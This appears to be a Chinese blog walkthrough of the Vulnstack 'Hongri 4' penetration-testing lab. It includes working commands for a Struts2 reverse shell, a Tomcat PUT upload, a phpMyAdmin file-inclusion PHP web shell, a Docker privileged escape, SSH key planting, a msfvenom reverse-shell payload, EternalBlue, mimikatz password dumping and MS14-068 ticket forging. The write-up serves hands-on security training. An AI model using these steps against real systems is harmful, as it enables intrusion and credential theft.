ATT&CK 红日4靶机渗透攻略

下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

环境搭建

在这里插入图片描述

IP地址为dhcp获取
ubuntu:ubuntu 域成员机器
douser:Dotest123 DC:
administrator:Test2008 登陆后要改密码 !qaz2008

网络环境
DC : 192.168.75.132 VMNET1 (网卡改为自动获取ip)
在这里插入图片描述

WIN7: 192.168.75.130 VMNET1
在这里插入图片描述

UBAUNTU: 192.168.93.136 NAT ; 192.168.75.131 VMNET1

在这里插入图片描述

在ubuntu启动docker环境
sudo docker start ec 17 09 bb da 3d ab ad 几个error不用管
在这里插入图片描述

知识点

大家好红日安全红队靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。
靶场学习路径,可参考
strusts漏洞利用
phpmyadmin getshell
tomcat 漏洞利用
docker逃逸
ms14-068
ssh密钥利用
流量转发
历史命令信息泄露
域渗透
[

](https://blog.csdn.net/weixin_47533648/article/details/121668299)

信息收集

nmap扫描

nmap -sC -sV 192.168.93.136
在这里插入图片描述

发现22ssh,2001、2002、2003 http

网站信息收集

2001端口是一个文件上传的页面,在title中显示struts2
在这里插入图片描述

2002端口是tomcat默认页面
在这里插入图片描述

2003端口是phpmyadmin,没有密码直接进入
在这里插入图片描述

漏洞利用

struts2_045

用工具扫描struts2,存在struts2_045漏洞
在这里插入图片描述

在这里插入图片描述

直接执行命令反弹shell
在这里插入图片描述

成功getshell
在这里插入图片描述

tomcat CVE-2017-12615

nickto扫描一下tomcat 发现允许put和delete方法
在这里插入图片描述

直接打poc 成功getshell
在这里插入图片描述

在这里插入图片描述

phpmyadmin CVE-2018-12613

phpmyadmin 版本为4.8.1,考虑使用CVE-2018-12613 文件包含漏洞
在这里插入图片描述

http://192.168.93.136:2003/?target=tbl_zoom_select.php?/../../../../../../etc/passwd

在这里插入图片描述

利用session文件创建shell
在test库中新建表
在这里插入图片描述

写个一句话木马

<?php @eval($_GET['123']);?>

在这里插入图片描述

查看session d41914d5981e52cc8bd2d618f8e675c5
在这里插入图片描述

http://192.168.93.136:2003/?target=tbl_zoom_select.php?/…/…/…/…/…/…/tmp/sess_d41914d5981e52cc8bd2d618f8e675c5
成功执行
在这里插入图片描述

未连接成功一句话木马

docker逃逸

检测是否在docker中
ls -alh /.dockerenv
cat /proc/1/cgroup
在这里插入图片描述

发现当前属于docker环境

利用特权模式逃逸

如果是通过特权模式启动容器,就可以获得大量设备文件的访问权限,因为管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。

新建一个目录用于挂载
mkdir /tmp/forest
挂在新建的目录
mount /dev/sda1 /tmp/forest

在这里插入图片描述

struts2的shell没成功,tomcat的shell成功逃逸
kali监听端口
在这里插入图片描述

ssh免密登录

kali创建http服务
在这里插入图片描述

靶机下载公钥
在这里插入图片描述

公钥拷贝到ubuntu的.ssh中
cp id_rsa.pub /tmp/forest/home/ubuntu/.ssh/authorized_keys

在这里插入图片描述

注意需要给authorized_keys 644权限

在这里插入图片描述

ssh免密登录成功
在这里插入图片描述

内网信息收集

发现内网网段

执行ip a 发现内网网段192.168.75.0
在这里插入图片描述

MSF上线

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.93.130 LPORT=4444 -f elf > shell.elf

kali监听
use exploit/multi/handler
set lhost 192.168.93.130
set payload linux/x86/meterpreter/reverse_tcp
run

在这里插入图片描述

上线成功
在这里插入图片描述

添加路由
run autoroute -s 192.168.75.0/24
在这里插入图片描述

在这里插入图片描述

使用tcp扫描
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.75.0/24
set threads 20
在这里插入图片描述

set threads 20
扫描出192.168.75.130 132都存在445
在这里插入图片描述

在这里插入图片描述

扫描一下ms17-010
use auxiliary/scanner/smb/smb_ms17_010
win7 2008可能都存在
在这里插入图片描述

内网横向

socks隧道

(两个隧道工具起一个就行,本次用frp)

chisel

上传chisel到ubuntu靶机起server
在这里插入图片描述

kali 起client

在这里插入图片描述

frp

靶机起client
在这里插入图片描述

kali起server
在这里插入图片描述

ms17-010

setg proxies socks5:192.168.93.130:6005
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.75.133
set payload windows/x64/meterpreter/bind_tcp
set lport 5555
set autorunscript post/windows/manage/migrate
run
(打了三次才成功…不知为啥…)
在这里插入图片描述

win7
在这里插入图片描述

内网信息收集

chcp 65001 解决乱码问题
在这里插入图片描述

ipconfig /all
发现demo.com ,并且dns为本地ip (一般dc上会装dns)

当前为本机system用户,并不是域管理员用户
在这里插入图片描述

net view 查看域用户
在这里插入图片描述

cd \Users\douser\Desktop 在桌面上发现了很多东西,比如mimikatz.exe,MS14-068.exe

在这里插入图片描述

mimikatz导出密码

mimikatz.exe
sekurlsa::logonpasswords
在这里插入图片描述

发现用户密码 douser Dotest123
验证WIN-ENS2VR5TR3N为域控
在这里插入图片描述

MS14-068 域提权漏洞

由于重启过win7IP发生变化

条件:获得普通域用户以及密码 ,以及用户的suid ip为域控ip
ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.75.135 -p Dotest123
MS14-068.exe -u @ -p -s -d

注意ip地址为2008的ip
在这里插入图片描述

mimikatz # kerberos::purge 清空凭证
mimikatz # kerberos::list 查看凭证
列表
mimikatz # kerberos::ptc TGT_douser@demo.com.ccache 导入票据
在这里插入图片描述

net use \WIN-ENS2VR5TR3N 查看域控用户信息
dir \\WIN-ENS2VR5TR3N\c$

成功连接到2008域控,并查看域控c盘
在这里插入图片描述

  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值